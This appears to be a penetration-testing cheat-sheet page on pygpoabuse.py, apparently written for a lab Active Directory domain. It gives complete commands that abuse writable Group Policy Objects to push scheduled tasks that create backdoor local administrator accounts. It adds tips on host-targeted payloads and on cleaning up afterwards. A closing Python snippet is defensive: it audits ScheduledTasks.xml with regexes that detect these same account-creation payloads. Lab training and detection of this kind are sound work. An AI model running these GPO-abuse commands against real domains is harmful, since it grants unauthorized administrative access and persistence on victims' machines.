# pygpoabuse.py
Very cool utility to abuse GPO objects where you have excessive permissions, such as GenericWrite. Here's an example:
```
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -v
```
In the command above:

- `THE ID YOU COPIED MINUS THE CURLY BRACES` is exactly that: the ID you copy off the GPO in BloodHound, minus the curly braces.
- `BACKDOORUSER` would be a local admin account you want to install on the system.
- `Mypass123!` is the password that will be assigned to your backdoor account. IMPORTANT: MAKE THE PASSWORD FEWER THAN 14 CHARACTERS!
- `-taskname "Whatever you wanna call the task"` is exactly that: some name for the scheduled task that gets queued up behind the scenes.
- `-v` adds verbosity.
## Tip

When using this to summon a command such as `-command "certutil -syncwithwu \\\\10.1.2.3"`, you'll want to escape backslashes in a UNC path with double backslashes.
## Tip #2

If you run this script without a `-command` flag, it will insert a scheduled task that has a payload of something like:

```
net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /add
```

I'm not 100% on this, but I think you need to use `&amp;&amp;` and not literally `&&` in the .xml file or the task will fail.
## Tip #3

If you want to target your payload to only fire on a specific machine name, use the `if` command like so:

```
if /i "%COMPUTERNAME%"=="VICTIM-PC-LOL" net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /add
```
## Tip #4

To clean up the ScheduledTasks.xml, run the same command you used to create the task, but with `--cleanup` added:

```
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" --cleanup -v
```

- `--cleanup` cleans up (deletes) the task after it runs.
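Defender-side companion to the tips above, as an added example that is not part of this page or of pygpoabuse: it parses a ScheduledTasks.xml as found under a GPO's SYSVOL folder and flags immediate tasks carrying the account-creation payloads described here. The sample XML is constructed and only loosely follows the GPP ScheduledTasks layout; it also shows that `&amp;&amp;` in the file comes back as `&&` once parsed (Tip #2) and catches the `%COMPUTERNAME%` conditional from Tip #3.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a GPP ScheduledTasks.xml from SYSVOL after an
# immediate task was added; every name and value here is made up for illustration.
SAMPLE_XML = """<ScheduledTasks>
  <ImmediateTaskV2 name="Windows Update Check">
    <Properties action="C" name="Windows Update Check" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cmd</Command>
        <Arguments>/c if /i "%COMPUTERNAME%"=="VICTIM-PC-LOL" net user administrator7 S3cr3bkd00r! /add &amp;&amp; net localgroup Administrators administrator7 /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <ScheduledTask name="Nightly Backup">
    <Properties action="U" name="Nightly Backup" runAs="%LogonDomain%\\%LogonUser%">
      <Task version="1.2"><Actions><Exec><Command>backup.exe</Command><Arguments>/full</Arguments></Exec></Actions></Task>
    </Properties>
  </ScheduledTask>
</ScheduledTasks>
"""

SUSPICIOUS = [
    (re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I), "local account creation"),
    (re.compile(r"\bnet1?\s+localgroup\s+administrators\b.*\s/add\b", re.I), "admin group addition"),
    (re.compile(r"%COMPUTERNAME%", re.I), "host-conditional payload"),
]

def audit_scheduled_tasks(xml_text):
    """Return (task_name, element_tag, command_line, reasons) for each task worth a look."""
    findings = []
    for task in ET.fromstring(xml_text):
        props, exec_node = task.find("Properties"), task.find(".//Actions/Exec")
        if props is None or exec_node is None:
            continue
        # The parser has already turned &amp;&amp; back into &&, so the regexes see the
        # command line exactly as cmd.exe will when the task fires.
        line = f"{exec_node.findtext('Command', '')} {exec_node.findtext('Arguments', '')}".strip()
        reasons = [label for rx, label in SUSPICIOUS if rx.search(line)]
        if task.tag == "ImmediateTaskV2":
            reasons.append("immediate task (fires at next policy refresh)")
        if "system" in (props.get("runAs") or "").lower():
            reasons.append("runs as SYSTEM")
        if reasons:
            findings.append((props.get("name"), task.tag, line, reasons))
    return findings

if __name__ == "__main__":
    for name, tag, line, reasons in audit_scheduled_tasks(SAMPLE_XML):
        print(f"[!] {tag} '{name}': {'; '.join(reasons)}\n    {line}")
```

Point it at the real `ScheduledTasks.xml` under `\\<domain>\SYSVOL\<domain>\Policies\{GPO-ID}\Machine\Preferences\ScheduledTasks\` to review what a GPO will push; the benign `ScheduledTask` entry in the sample produces no finding.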